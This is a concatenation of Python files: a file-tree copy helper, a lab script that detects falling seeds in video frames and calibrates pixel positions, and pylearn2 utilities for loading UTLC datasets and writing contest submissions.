If the optional symlinks flag is true, symbolic links in the
source tree result in symbolic links in the destination tree; if
it is false, the contents of the files pointed to by symbolic
links are copied.
The optional ignore argument is a callable. If given, it
is called with the `src` parameter, which is the directory
being visited by copytree(), and `names` which is the list of
`src` contents, as returned by os.listdir():
callable(src, names) -> ignored_names
Since copytree() is called recursively, the callable will be
called once for each directory that is copied. It returns a
list of names relative to the `src` directory that should
not be copied.
XXX Consider this example code rather than the ultimate tool.
"""
names = _os.listdir(src)
if ignore is not None:
ignored_names = ignore(src, names)
else:
ignored_names = set()
if not exists(dst):
_os.makedirs(dst)
errors = []
for name in names:
if name in ignored_names:
continue
srcname = _os.path.join(src, name)
dstname = _os.path.join(dst, name)
try:
if symlinks and _os.path.islink(srcname):
linkto = _os.readlink(srcname)
_os.symlink(linkto, dstname)
elif _os.path.isdir(srcname):
_copytree(srcname, dstname, symlinks, ignore)
else:
# Will raise a SpecialFileError for unsupported file types
_shutil.copy2(srcname, dstname)
# catch the Error from the recursive copytree so that we can
# continue with other files
except _shutil.Error as err:
errors.extend(err.args[0])
except EnvironmentError as why:
errors.append((srcname, dstname, str(why)))
try:
_shutil.copystat(src, dst)
except OSError as why:
if _shutil.WindowsError is not None and isinstance \
(why, _shutil.WindowsError):
# Copying file access times may fail on Windows
pass
else:
errors.append((src, dst, str(why)))
if errors:
raise _shutil.Error(errors)
def _is_string(obj):
try:
return isinstance(obj, basestring)
except NameError:
return isinstance(obj, str)
| |
from scipy import misc
import os
import fnmatch
import numpy as np
import matplotlib.pyplot as plt
from scipy import ndimage
from scipy import signal
from tqdm import tqdm
import pickle
# %matplotlib inline
# images lading and processing functions ---------------------------------------
def generate_image_list(path_to_images, pattern='*.png'):
    """Return the sorted list of image file names found in a directory.

    Parameters
    ----------
    path_to_images : str
        Directory to scan (only its direct entries are considered).
    pattern : str, optional
        fnmatch-style pattern an entry must match to be kept; defaults to
        '*.png', preserving the historical behavior.

    Returns
    -------
    list of str
        Matching file names (names only, not full paths), sorted
        lexicographically so frame order follows zero-padded numbering.
    """
    # sorted() over a generator replaces the original append-then-sort loop.
    return sorted(name for name in os.listdir(path_to_images)
                  if fnmatch.fnmatch(name, pattern))
def read_one_image(path_to_images, image, verbose=0):
    """Load one image file from *path_to_images* + *image* and return its array.

    NOTE(review): ``scipy.misc.imread`` was removed in SciPy >= 1.2; this
    code requires an old SciPy with PIL installed — consider migrating to
    ``imageio.imread``.
    """
    # Plain concatenation: *path_to_images* is expected to end with '/'.
    name_image_current = path_to_images + image
    image_current = misc.imread(name_image_current)
    if verbose > 1:
        print "Read: " + name_image_current
        print "Native shape: " + str(image_current.shape)
        # Display the raw frame (blocks until the window is closed).
        plt.imshow(image_current)
        plt.show()
    return image_current
def load_all_images(list_images, dict_images, verbose=0):
for current_image_name in list_images:
dict_images[current_image_name] = read_one_image(path_to_images, current_image_name)
if verbose > 1:
print "Loaded " + current_image_name
def shape_image(image_name, dict_images, verbose=0):
    """Return the ``.shape`` tuple of the image stored under *image_name*.

    Parameters
    ----------
    image_name : str
        Key into *dict_images*.
    dict_images : dict
        Mapping of image name -> numpy array.
    verbose : int, optional
        > 1 prints the shape.

    Returns
    -------
    tuple
        The array's shape, typically (height, width, channels).
    """
    # The original named this local ``shape_image``, shadowing the
    # function's own name; renamed for clarity.
    image_shape = dict_images[image_name].shape
    if verbose > 1:
        print("Shape image: " + str(image_shape))
    return image_shape
def compute_mean_image(list_images, dict_images, shape_image, image_max=-1, verbose=0):
    """Compute per-pixel mean and standard-deviation images over the frames.

    Results are stored in *dict_images* under the keys ``'mean_image'`` and
    ``'std_image'`` as uint8 arrays (values floored).

    Parameters
    ----------
    list_images : list of str
        Ordered frame names; the first *image_max* (or all) are used.
    dict_images : dict
        Frame name -> image array; updated in place with the results.
    shape_image : tuple
        (height, width, channels) of a single frame.
    image_max : int, optional
        Number of leading frames to use; <= 0 means every frame.
    verbose : int, optional
        > 0 displays the mean and std images with matplotlib.
    """
    # The original duplicated the stacking loop in both branches; only the
    # frame count differed, so compute that count once.
    if image_max > 0:
        number_of_images = image_max
    else:
        number_of_images = len(list_images)
    stacked = np.zeros((shape_image[0], shape_image[1], shape_image[2], number_of_images), dtype=np.uint8)
    for ind_image in range(number_of_images):
        stacked[:, :, :, ind_image] = dict_images[list_images[ind_image]]
    mean_image = np.uint8(np.floor(np.mean(stacked, 3)))
    std_image = np.uint8(np.floor(np.std(stacked, 3)))
    dict_images['mean_image'] = mean_image
    dict_images['std_image'] = std_image
    if verbose > 0:
        plt.figure()
        plt.imshow(mean_image)
        plt.figure()
        plt.imshow(std_image)
        plt.show()
def compute_change_image(list_images, dict_images, image_number, plot_L2=False, verbose=0):
    """Return the absolute per-pixel difference between a frame and the mean image.

    The subtraction is done in float16 to avoid uint8 wrap-around, then the
    result is floored back to uint8.

    Parameters
    ----------
    list_images : list of str
        Ordered frame names.
    dict_images : dict
        Must contain the frame and a precomputed ``'mean_image'`` entry
        (see ``compute_mean_image``).
    image_number : int
        Index of the frame in *list_images*.
    plot_L2 : bool, optional
        If True, also compute (and at verbose > 1 plot) the per-pixel L2
        norm across color channels. The original referenced an undefined
        ``L2_norm`` helper and crashed with NameError; the norm is now
        computed inline.
    verbose : int, optional
        > 1 displays the difference image.

    Returns
    -------
    numpy.ndarray of uint8
        The absolute difference image, same shape as the frame.
    """
    image_name = list_images[image_number]
    image = dict_images[image_name]
    mean_image = dict_images['mean_image']
    # (The original also fetched 'std_image' without using it; removed.)
    image_difference = np.uint8(np.floor(np.abs(np.float16(image) - np.float16(mean_image))))
    if plot_L2:
        # Per-pixel L2 norm across the channel axis; replaces the
        # undefined L2_norm() of the original.
        float_difference = np.sqrt(np.sum(np.float32(image_difference) ** 2, axis=2))
    if verbose > 1:
        plt.figure()
        plt.imshow(image_difference)
        if plot_L2:
            plt.figure()
            plt.pcolor(float_difference)
            plt.colorbar()
        plt.show()
    return(image_difference)
def threshold_image(shape_image, change_image, threshold_change, verbose=0):
    """Return a uint8 mask (1/0) of pixels changed in all three channels.

    A pixel is marked 1 only when *every* color channel of *change_image*
    is >= *threshold_change*.

    Parameters
    ----------
    shape_image : tuple
        Kept for interface compatibility; the mask's shape actually
        follows *change_image* itself.
    change_image : numpy.ndarray
        (H, W, 3) difference image (see ``compute_change_image``).
    threshold_change : number
        Per-channel threshold.
    verbose : int, optional
        > 1 displays the mask.

    Returns
    -------
    numpy.ndarray of uint8
        (H, W) binary mask.
    """
    # The original pre-allocated a zeros array (shadowing the function's
    # own name) that was immediately overwritten; that dead store is gone.
    channel_hits = [np.float32(change_image[:, :, c]) >= np.float32(threshold_change)
                    for c in range(3)]
    mask = np.uint8(channel_hits[0] & channel_hits[1] & channel_hits[2])
    if verbose > 1:
        plt.figure()
        plt.imshow(mask)
        plt.show()
    return mask
def plot_as_image(image):
    """Rescale *image* to the uint8 range [0, 254] and display it.

    NOTE(review): divides by the image maximum — an all-zero input would
    divide by zero (numpy warns and produces invalid values).
    """
    # np.max applied twice collapses the first two axes; for a 2-D input
    # this is equivalent to image.max().
    max_image = np.max(np.max(image))
    image_uint8 = np.uint8(np.floor(254.0 * image / max_image))
    plt.figure()
    plt.imshow(image_uint8)
    print "Plot as image max: " + str(np.max(np.max(image)))
def convolve_disk(image_in, kernel_radius=10, verbose=0):
    """Convolve *image_in* (as float32) with a binary disk-shaped kernel.

    The kernel is a (2*kernel_radius)-square array whose entries are 1
    inside a disk of radius *kernel_radius* centered at
    (kernel_radius - 1, kernel_radius - 1), and 0 elsewhere. At
    verbose > 1 the kernel and the convolution result are displayed.
    """
    side = kernel_radius * 2
    # Vectorized construction of the same disk the original built with
    # two nested loops (identical inequality, identical center offset).
    rows, cols = np.ogrid[0:side, 0:side]
    inside = (rows - kernel_radius + 1) ** 2 + (cols - kernel_radius + 1) ** 2 < kernel_radius ** 2
    kernel = np.where(inside, 1.0, 0.0)
    if verbose > 1:
        plt.figure()
        plt.imshow(kernel)
    convolved = ndimage.convolve(np.float32(image_in), kernel)
    if verbose > 1:
        plot_as_image(convolved)
        plt.show()
    return convolved
def find_pos_seed(shape_image, list_images, dict_images, image_number, identification='lowest', verbose=0, debug=False):
    """Locate the seed in one frame via threshold + disk-convolution passes.

    Returns a (row, col) tuple, or 0 when no position is detected.

    NOTE(review): if *identification* is neither 'lowest' nor 'highest',
    ``position`` is never assigned and the function crashes with
    NameError a few lines later. Also, ``not position > 0`` compares a
    tuple with an int — legal on Python 2 only; on Python 3 it raises
    TypeError.
    """
    # Pass 1: difference vs. mean image, threshold, smooth with a disk.
    difference_image = compute_change_image(list_images, dict_images, image_number, plot_L2=False, verbose=verbose)
    threshold_change = 40
    thresholded_image = threshold_image(shape_image, difference_image, threshold_change, verbose=verbose)
    convolved = convolve_disk(thresholded_image, kernel_radius=11, verbose=0)
    # Rescale to [0, 255]; divides by the max (zero max would warn/NaN).
    convolved = np.uint8(255.0 * convolved / np.max(np.max(convolved)))
    # Replicate the smoothed mask into 3 channels so threshold_image can
    # be reused for a second, stricter pass.
    convolved_3_channels = np.zeros((shape_image[0], shape_image[1], shape_image[2]), dtype=np.uint8)
    convolved_3_channels[:, :, 0] = np.uint8(np.floor(convolved))
    convolved_3_channels[:, :, 1] = np.uint8(np.floor(convolved))
    convolved_3_channels[:, :, 2] = np.uint8(np.floor(convolved))
    threshold_change = 100
    thresholded_image = threshold_image(shape_image, convolved_3_channels, threshold_change, verbose=verbose)
    convolved = convolve_disk(thresholded_image, kernel_radius=11, verbose=verbose)
    convolved = np.uint8(255.0 * convolved / np.max(np.max(convolved)))
    # version to identify the lowest point of the seed
    if identification == 'lowest':
        index_valid = np.where(convolved > 250)
        if index_valid[0].size == 0:
            # Nothing above threshold: fall back to a sentinel at (0, 0).
            index_valid = ([0], [0])
        position_1 = np.min(index_valid[1])
        # should check if a position is detected here!
        if position_1 > 0:
            # Row index: mean of the rows where this column peaks.
            position_0 = int(np.floor(np.mean(np.where(convolved[:, position_1] == np.max(convolved[:, position_1])))))
            position = (position_0, position_1)
        else:
            position_1 = 0
            position_2 = 0
            position = (position_1, position_2)
    # version to identify the center of the seed
    elif identification == 'highest':
        position = np.unravel_index(convolved.argmax(), convolved.shape)
    else:
        print "Identification method not implemented!"
    if debug:
        print "position:"
        print position
    # Py2-only: a non-empty tuple always compares > 0, so this rewrites
    # only a (0, 0)-style "not found" result to the scalar sentinel 0.
    if not position > 0:
        position = 0
    if verbose > 0:
        print "Found position: " + str(position)
    if verbose > 1:
        image_current = dict_images[list_images[image_number]]
        plt.figure()
        # image_current = ndimage.rotate(image_current, 90)
        plt.imshow(image_current)
        # plt.plot(position[0], position[1], marker='o', color='r')
        plt.plot(position[1], position[0], marker='o', color='r')
        plt.show()
    return(position)
def find_pos_width_seed(shape_image, list_images, dict_images, image_number, pos_seed, half_width_box=150, height_box=80, verbose=0):
    """Find the two wing tips of the seed inside a box around *pos_seed*.

    Returns (wing_tip_1, wing_tip_2, std_width) where the tips are (row,
    col) coordinates *relative to the extracted box* and std_width is the
    row-spread of changed pixels; ((0, 0), (0, 0), 0) when undetected.

    NOTE(review): assumes *pos_seed* is indexable; ``find_pos_seed`` can
    return the scalar 0, in which case ``pos_seed[0]`` raises TypeError —
    callers must guard against that.
    """
    difference_image = compute_change_image(list_images, dict_images, image_number, verbose=verbose)
    threshold_change_image = 50
    thresholded_image = threshold_image(shape_image, difference_image, threshold_change_image, verbose=verbose)
    pos_1 = pos_seed[0]
    pos_2 = pos_seed[1]
    if pos_1 == 0:
        # Seed not located in this frame: return the sentinel result.
        return((0, 0), (0, 0), 0)
    # Crop a box around the seed; note the asymmetric column extent
    # (height_box/2 before, height_box after the seed column).
    reduced_image = thresholded_image[pos_1 - half_width_box:pos_1 + half_width_box, pos_2 - int(np.floor(height_box / 2)): pos_2 + height_box]
    if verbose > 1:
        plot_as_image(reduced_image)
    non_zero_image = np.where(reduced_image > 0)
    # Row spread of the changed pixels; np.std of an empty selection is
    # NaN (with a warning), which fails the > 0 test below.
    std_width = np.std(non_zero_image[0])
    if std_width > 0:
        # np.where output is row-major sorted: first/last entries are the
        # topmost and bottommost changed pixels of the box.
        wing_tip_1 = (non_zero_image[0][0], non_zero_image[1][0])
        wing_tip_2 = (non_zero_image[0][-1], non_zero_image[1][-1])
    else:
        std_width = 0
        wing_tip_1 = (0, 0)
        wing_tip_2 = (0, 0)
    if verbose > 1:
        plt.figure()
        plt.imshow(dict_images[list_images[image_number]])
        plt.plot(pos_seed[1], pos_seed[0], marker='o', color='r')
        plt.plot(wing_tip_1[1] + pos_seed[1] - int(np.floor(height_box / 2)), wing_tip_1[0] + pos_seed[0] - half_width_box, marker='o', color='b')
        plt.plot(wing_tip_2[1] + pos_seed[1] - int(np.floor(height_box / 2)), wing_tip_2[0] + pos_seed[0] - half_width_box, marker='o', color='g')
        plt.show()
    return(wing_tip_1, wing_tip_2, std_width)
def plot_image_with_identified_points(list_images, dict_images, image_number, pos_seed, wing_tip_1, wing_tip_2, half_width_box=150, height_box=80):
    """Display one frame with the seed position (red) and wing tips (blue/green).

    The wing-tip coordinates are box-relative (see find_pos_width_seed) and
    are shifted back to full-image coordinates before plotting. Blocks
    until the matplotlib window is closed.
    """
    plt.figure()
    plt.imshow(dict_images[list_images[image_number]])
    plt.plot(pos_seed[1], pos_seed[0], marker='o', color='r')
    plt.plot(wing_tip_1[1] + pos_seed[1] - int(np.floor(height_box / 2)), wing_tip_1[0] + pos_seed[0] - half_width_box, marker='o', color='b')
    plt.plot(wing_tip_2[1] + pos_seed[1] - int(np.floor(height_box / 2)), wing_tip_2[0] + pos_seed[0] - half_width_box, marker='o', color='g')
    plt.show()
# Analysis of one folder and processing of raw results functions ----------------------
def process_folder_load(path_to_folder, verbose=0):
    """Load every frame of one video folder and precompute mean/std images.

    Parameters
    ----------
    path_to_folder : str
        Directory holding the frames ('/'-terminated; see read_one_image).
    verbose : int, optional
        Verbosity forwarded to the helpers.

    Returns
    -------
    tuple
        (dict_images, list_images, number_of_images, tuple_shape_image).
    """
    print("Create necessary data structure")
    dict_images = {}
    print("Generate image names")
    # Fixed: the original listed the module-level global ``path_to_images``
    # instead of the *path_to_folder* argument.
    list_images = generate_image_list(path_to_folder)
    number_of_images = len(list_images)
    print("Number of images found: " + str(number_of_images))
    print("Load all images")
    # NOTE(review): load_all_images historically reads the global
    # ``path_to_images``; in the driver script below that global always
    # equals *path_to_folder*, so behavior is unchanged.
    load_all_images(list_images, dict_images, verbose=verbose)
    print("Determine size images")
    tuple_shape_image = shape_image(list_images[0], dict_images, verbose=verbose)
    print("Compute mean image")
    compute_mean_image(list_images, dict_images, tuple_shape_image, verbose=verbose)
    print("Done!")
    return(dict_images, list_images, number_of_images, tuple_shape_image)
def process_folder_process(path_to_folder, dict_images, list_images, number_of_images, tuple_shape_image, image_start=0, number_of_images_to_analyse=-1, verbose=0, debug=False):
    """Run seed detection over the loaded frames and collect the results.

    Returns (list_pos_seed, list_width_data_seed, list_true_wing_tip):
    per-frame seed positions, box-relative wing-tip data, and wing tips
    converted back to full-image coordinates.

    NOTE(review): find_pos_seed may return the scalar 0 when no seed is
    found; ``position[1]`` below then raises TypeError on Python 3
    (Python 2 tolerated the earlier tuple comparison producing it).
    ``raw_input`` is Python 2 only.
    """
    print "Generate positions and width for each seed from images"
    list_pos_seed = []
    list_width_data_seed = []
    list_true_wing_tip = []
    # Search-box geometry passed to find_pos_width_seed for every frame.
    half_width_box = 120
    height_box = 80
    if number_of_images_to_analyse > 0:
        max_range = number_of_images_to_analyse
    else:
        max_range = number_of_images - image_start
    for ind in tqdm(range(max_range)):
        # Shift the loop counter so ind is the absolute frame index.
        ind += image_start
        if verbose > 1:
            print "Locate seed in image number: " + str(ind)
        position = find_pos_seed(tuple_shape_image, list_images, dict_images, ind, verbose=verbose - 2, debug=debug)
        list_pos_seed.append(position)
        (wing_tip_1, wing_tip_2, std_width) = find_pos_width_seed(tuple_shape_image, list_images, dict_images, ind, position, half_width_box=half_width_box, height_box=height_box, verbose=verbose - 2)
        list_width_data_seed.append((wing_tip_1, wing_tip_2, std_width))
        # Convert box-relative tip coordinates back to image coordinates
        # (inverse of the crop offsets used in find_pos_width_seed).
        wing_tip_1_0 = wing_tip_1[1] + position[1] - int(np.floor(height_box / 2))
        wing_tip_1_1 = wing_tip_1[0] + position[0] - half_width_box
        wing_tip_2_0 = wing_tip_2[1] + position[1] - int(np.floor(height_box / 2))
        wing_tip_2_1 = wing_tip_2[0] + position[0] - half_width_box
        list_true_wing_tip.append((wing_tip_1_0, wing_tip_1_1, wing_tip_2_0, wing_tip_2_1))
        if verbose > 2:
            if list_width_data_seed[-1][2] > 0:
                plot_image_with_identified_points(list_images, dict_images, ind, list_pos_seed[-1], list_width_data_seed[-1][0], list_width_data_seed[-1][1], half_width_box=half_width_box, height_box=height_box)
            # Interactive stepping only in the "analyse everything" mode.
            if number_of_images_to_analyse == -1:
                continue_processing = raw_input("Continue? yes [y] or no [n]: ")
                if continue_processing == 'n':
                    break
    print "Done!"
    return(list_pos_seed, list_width_data_seed, list_true_wing_tip)
# Calibration and fine analysis of raw results functions ---------------------------------
class generateDataOnClick:
    """Matplotlib callback object that records left-click data coordinates.

    Connect ``position_on_click`` to a figure's 'button_press_event'; each
    left click inside an axes appends its (xdata, ydata) to the
    accumulator and draws a red marker.
    """
    def __init__(self, verbose=0):
        # Accumulated (xdata, ydata) tuples, in click order.
        self.position_on_click_accumulator = []
        self.verbose = verbose
    def position_on_click(self, event):
        """Handle a matplotlib button-press event."""
        # Pixel coordinates of the click; currently unused (data
        # coordinates below are what gets stored).
        x, y = event.x, event.y
        if event.button == 1:
            # Only record clicks that land inside an axes.
            if event.inaxes is not None:
                if self.verbose > 0:
                    print 'data coords:' + str(event.xdata) + " , " + str(event.ydata)
                self.position_on_click_accumulator.append((event.xdata, event.ydata))
                plt.plot(event.xdata, event.ydata, marker='o', color='r')
                plt.show()
    def return_positions(self):
        """Return the list of recorded (xdata, ydata) positions."""
        return self.position_on_click_accumulator
def generate_data_calibration_click(path_to_images, image, verbose=0):
    """Interactively collect pixel positions of calibration points.

    Displays the calibration image and records every left click until the
    figure is closed, returning the clicked (x, y) pixel positions.

    NOTE(review): reads the module-level global ``position_points`` (the
    physical calibration coordinates) for display only — it is not a
    parameter, so this function cannot run before that global is defined.
    """
    if verbose > 0:
        print "Load image to use for calibration"
    image_calibration = read_one_image(path_to_images, image, verbose=verbose)
    if verbose > 0:
        print "Position of the calibration points:"
        for a in position_points:
            print str(a)
    if verbose > 0:
        print "Select all points to use for calibration and then close the figure"
    plt.figure()
    plt.imshow(image_calibration)
    # Route button presses to the accumulator object; blocks in show()
    # until the user closes the window.
    generate_data_click_object = generateDataOnClick(verbose=verbose)
    plt.connect('button_press_event', generate_data_click_object.position_on_click)
    plt.show()
    selected_positions_pixels = generate_data_click_object.return_positions()
    return selected_positions_pixels
def generate_vertical_positions_table(min, max, step, verbose=0):
    """Build the list of (0, y) physical calibration positions.

    Parameters
    ----------
    min, max, step : number
        Forwarded to ``np.arange(min, max, float(step))``; *max* is
        excluded. (The first two parameter names shadow the builtins but
        are kept unchanged for interface compatibility.)
    verbose : int, optional
        > 0 prints the generated points.

    Returns
    -------
    list of tuple
        [(0, y0), (0, y1), ...] with float y values.
    """
    # Comprehension replaces the original append loop.
    vertical_positions_table = [(0, value) for value in np.arange(min, max, float(step))]
    if verbose > 0:
        print("Number of points generated: " + str(len(vertical_positions_table)))
        print("Points generated:")
        for point in vertical_positions_table:
            print(point)
    return vertical_positions_table
# position_points contains the list of physical positions (x,y) in mm of the points on which the user will click
# ex: position_points = [(0,0), (0,10), (0,20)]
# NOTE: this function is ok for course use but too simplistic for 'research' use. as it uses only one
# polynomial based only on the y values instead of x = P1(pxlx, pxly) and y = P2(pxlx, pxly)
def perform_fitting_calibration_vertical(selected_positions_pixels, position_points, order=3, verbose=0, debug=False):
    """Fit a 1-D polynomial calibration from clicked pixels to physical mm.

    Fits ``np.polyfit(x, y, order)`` where x is column 0 of the first
    argument and y is column 1 of the second.

    NOTE(review): the driver script at the bottom of this file calls this
    as ``perform_fitting_calibration_vertical(position_points,
    selected_positions_pixels, ...)`` — i.e. with the arguments in the
    OPPOSITE order of these parameter names. With that call, x ends up
    being the clicked pixel x-coordinates and y the physical mm values,
    which is what makes the fit meaningful; confirm intent before
    renaming anything.
    NOTE(review): a length mismatch only prints a warning and continues;
    np.polyfit will then fail with a less helpful error.
    """
    if not len(position_points) == len(selected_positions_pixels):
        print "Problem: not the same number of mm and pxls locations!!"
    y = np.asarray(selected_positions_pixels)
    x = np.asarray(position_points)
    if debug:
        print x
        print y
    # Reduce each (x, y) pair list to a single coordinate: column 0 of x,
    # column 1 of y (see the call-order note above).
    x = x[:, 0]
    y = y[:, 1]
    if debug:
        print x
        print y
    z = np.polyfit(x, y, order)
    if verbose > 1:
        print "Test calibration"
        plt.figure()
        plt.plot(x, y, marker='o', color='r')
        # Evaluate the fit over the full pixel range for a visual check.
        values_test = np.arange(0, 1200, 1.0)
        poly_z = np.poly1d(z)
        plt.plot(values_test, poly_z(values_test), label='calibration points')
        plt.xlabel('Pixels')
        plt.ylabel('Coordinates')
        plt.legend(loc=2)
        plt.show()
    return z
def save_one_result(result_data, result_name):
    """Pickle *result_data* into the current case's folder as <result_name>.pkl.

    Relies on the module-level globals ``path``, ``list_cases`` and
    ``ind_case`` set by the driver loop below.
    """
    # 'wb' (not 'w'): pickle.HIGHEST_PROTOCOL is a binary format, so the
    # file must be opened in binary mode.
    with open(path + list_cases[ind_case] + '/' + result_name + '.pkl', 'wb') as crrt_file:
        pickle.dump(result_data, crrt_file, pickle.HIGHEST_PROTOCOL)
################################################################################
################################################################################
# Here is the code that uses all the previously defined functions to do the
# analysis; update paths, fnmatch arguments etc as needed.
# Root folder containing the calibration video and the seed cases.
path = '/media/hydroubuntu/Seagate Expansion Drive/data_lab_module_07122016/data_seed/'
# perform the calibration ------------------------------------------------------
folder = 'calibration_video.mkvDIR'
# Physical positions (mm) the user will click on, top to bottom.
position_points = generate_vertical_positions_table(0, 600, 100, verbose=0)  # do it in mm
selected_positions_pixels = generate_data_calibration_click(path + folder + '/', '00000001.png', verbose=0)
# NOTE(review): arguments here are (position_points, selected_positions_pixels)
# while the function signature declares (selected_positions_pixels,
# position_points) — see the note on perform_fitting_calibration_vertical.
poly_fit_calibration = perform_fitting_calibration_vertical(position_points, selected_positions_pixels, order=3, verbose=2, debug=False)
print "save calibration"
np.save(path + 'poly_fit_calibration', poly_fit_calibration)
# loads the calibration --------------------------------------------------------
# Round-trips through the .npy just saved above (same coefficients).
poly_fit_calibration = np.load(path + 'poly_fit_calibration.npy')
# load list of all cases -------------------------------------------------------
list_cases = []
for file_name in os.listdir(path):
    if fnmatch.fnmatch(file_name, 'seed_*DIR'):
        list_cases.append(file_name)
print "Cases to process:"
for crrt_case in list_cases:
    print crrt_case
print " "
nbr_cases = len(list_cases)
print "Number of cases: " + str(nbr_cases)
# perform analysis of all cases ------------------------------------------------
for ind_case in range(nbr_cases):
    print ""
    print "------------------------------------------------------------"
    print "Analysing case: " + str(list_cases[ind_case])
    print "Case index: " + str(ind_case) + ' out of ' + str(nbr_cases)
    # Global also read implicitly by load_all_images / save_one_result.
    path_to_images = path + list_cases[ind_case] + '/'
    (dict_images, list_images, number_of_images, tuple_shape_image) = process_folder_load(path_to_images, verbose=0)
    (list_pos_seed, list_width_data_seed, list_true_wing_tip) = process_folder_process(path_to_images, dict_images, list_images, number_of_images, tuple_shape_image, image_start=0, number_of_images_to_analyse=-1, verbose=0, debug=False)
    print "Saving generated data"
    save_one_result(list_pos_seed, 'list_pos_seed')
    save_one_result(list_width_data_seed, 'list_width_data_seed')
    save_one_result(list_true_wing_tip, 'list_true_wing_tip')
| |
"""Several utilities for experimenting upon utlc datasets"""
# Standard library imports
import logging
import os
import inspect
import zipfile
from tempfile import TemporaryFile
# Third-party imports
import numpy
import theano
from pylearn2.datasets.utlc import load_ndarray_dataset, load_sparse_dataset
from pylearn2.utils import subdict, sharedX
logger = logging.getLogger(__name__)
##################################################
# Shortcuts and auxiliary functions
##################################################
def getboth(dict1, dict2, key, default=None):
    """Look *key* up in *dict1*, falling back to *dict2*.

    Parameters
    ----------
    dict1 : dict
        Preferred mapping.
    dict2 : dict
        Fallback mapping.
    key : hashable
        Key to look up.
    default : object, optional
        Value returned when the key is in neither mapping. When *default*
        is None (the default), a missing key raises KeyError instead.

    Returns
    -------
    object
        ``dict1[key]`` if present, else ``dict2[key]``, else *default*.

    Raises
    ------
    KeyError
        If the key is in neither dict and no non-None *default* is given.
    """
    try:
        return dict1[key]
    except KeyError:
        if default is None:
            # No usable default: let dict2 raise KeyError when missing.
            return dict2[key]
        return dict2.get(key, default)
##################################################
# Datasets loading and contest facilities
##################################################
def load_data(conf):
    """Load the dataset named by ``conf['dataset']`` and return its subsets.

    Returns [train, valid, test] (plus an optional fourth subset when the
    loader provides one). Dense data is wrapped in Theano shared variables
    unless on-the-fly normalization is requested; sparse data is returned
    as-is.

    Parameters
    ----------
    conf : dict
        Experiment configuration; relevant keys include 'dataset',
        'sparse', 'normalize' and 'normalize_on_the_fly', plus any keyword
        arguments accepted by the underlying pylearn2 loader.

    Returns
    -------
    list
        The dataset subsets as described above.
    """
    logger.info('... loading dataset')
    # Special case for sparse format
    if conf.get('sparse', False):
        # Forward only the conf keys the loader's signature accepts.
        expected = inspect.getargspec(load_sparse_dataset)[0][1:]
        data = load_sparse_dataset(conf['dataset'], **subdict(conf, expected))
        valid, test = data[1:3]
        # Sparse TERRY data on LISA servers contains an extra null first row in
        # valid and test subsets.
        if conf['dataset'] == 'terry':
            valid = valid[1:]
            test = test[1:]
            assert valid.shape[0] == test.shape[0] == 4096, \
                'Sparse TERRY data loaded has wrong number of examples'
        if len(data) == 3:
            return [data[0], valid, test]
        else:
            return [data[0], valid, test, data[3]]
    # Load as the usual ndarray
    expected = inspect.getargspec(load_ndarray_dataset)[0][1:]
    data = load_ndarray_dataset(conf['dataset'], **subdict(conf, expected))
    # Special case for on-the-fly normalization
    if conf.get('normalize_on_the_fly', False):
        return data
    # Allocate shared variables
    def shared_dataset(data_x):
        """Wrap one subset in a Theano shared variable (sharedX when the
        'normalize' option is on, raw theano.shared otherwise)."""
        if conf.get('normalize', True):
            return sharedX(data_x, borrow=True)
        else:
            return theano.shared(theano._asarray(data_x), borrow=True)
    # NOTE(review): on Python 3 map() returns an iterator, not a list —
    # this module is Python 2 era code; callers index the result.
    return map(shared_dataset, data)
def save_submission(conf, valid_repr, test_repr):
    """
    Create a submission .zip given a configuration dictionary and a
    representation for valid and test.

    Parameters
    ----------
    conf : dict
        Must provide 'savedir', 'dataset' and 'expname'.
    valid_repr : numpy array
        Representation of the validation set (examples x features).
    test_repr : numpy array
        Representation of the test set (examples x features).
    """
    logger.info('... creating zipfile')
    # Ensure the given directory is correct
    submit_dir = conf['savedir']
    if not os.path.exists(submit_dir):
        os.makedirs(submit_dir)
    elif not os.path.isdir(submit_dir):
        raise IOError('savedir %s is not a directory' % submit_dir)
    basename = os.path.join(submit_dir, conf['dataset'] + '_' + conf['expname'])
    # If there are too much features, outputs kernel matrices
    if (valid_repr.shape[1] > valid_repr.shape[0]):
        valid_repr = numpy.dot(valid_repr, valid_repr.T)
        test_repr = numpy.dot(test_repr, test_repr.T)
    # Quantitize data
    # NOTE(review): divides by the representation maximum — an all-zero
    # representation would divide by zero here.
    valid_repr = numpy.floor((valid_repr / valid_repr.max())*999)
    test_repr = numpy.floor((test_repr / test_repr.max())*999)
    # Store the representations in two temporary files
    valid_file = TemporaryFile()
    test_file = TemporaryFile()
    numpy.savetxt(valid_file, valid_repr, fmt="%.3f")
    numpy.savetxt(test_file, test_repr, fmt="%.3f")
    # Reread those files and put them together in a .zip
    valid_file.seek(0)
    test_file.seek(0)
    submission = zipfile.ZipFile(basename + ".zip", "w",
                                 compression=zipfile.ZIP_DEFLATED)
    # NOTE(review): the archive member names embed the full *basename*
    # path, not just the file name — presumably intentional for the
    # contest's expected layout; confirm before changing.
    submission.writestr(basename + '_valid.prepro', valid_file.read())
    submission.writestr(basename + '_final.prepro', test_file.read())
    submission.close()
    valid_file.close()
    test_file.close()
def create_submission(conf, transform_valid, transform_test=None, features=None):
    """
    Build and save a submission archive from a configuration dictionary
    and one (or two) representation functions.

    The datasets are reloaded with randomization disabled so the valid and
    test examples keep their canonical order.

    Parameters
    ----------
    conf : dict
        Experiment configuration (dataset name, normalization flags, ...).
    transform_valid : callable
        Maps the raw valid set to its representation.
    transform_test : callable, optional
        Maps the raw test set; defaults to *transform_valid*.
    features : sequence of int, optional
        Column indices to keep before transforming.
    """
    if transform_test is None:
        transform_test = transform_valid
    # Reload without permutation so valid/test keep their original order.
    load_conf = subdict(conf, ['dataset', 'normalize', 'normalize_on_the_fly', 'sparse'])
    load_conf.update(randomize_valid=False, randomize_test=False)
    valid_set, test_set = load_data(load_conf)[1:3]
    if not conf.get('sparse', False):
        # Dense subsets come back as Theano shared variables; unwrap them.
        valid_set = valid_set.get_value(borrow=True)
        test_set = test_set.get_value(borrow=True)
    if features is not None:
        # Keep only the requested feature columns.
        valid_set = valid_set[:, features]
        test_set = test_set[:, features]
    # Compute the representations and write them out as a .zip submission.
    valid_repr = transform_valid(valid_set)
    test_repr = transform_test(test_set)
    save_submission(conf, valid_repr, test_repr)
##################################################
# Proxies for representation evaluations
##################################################
def compute_alc(valid_repr, test_repr):
    """
    Returns the ALC of the valid set VS test set
    Note: This proxy won't work in the case of transductive learning
    (This is an assumption) but it seems to be a good proxy in the
    normal case (i.e only train on training set)

    NOTE(review): this function is currently non-functional — it always
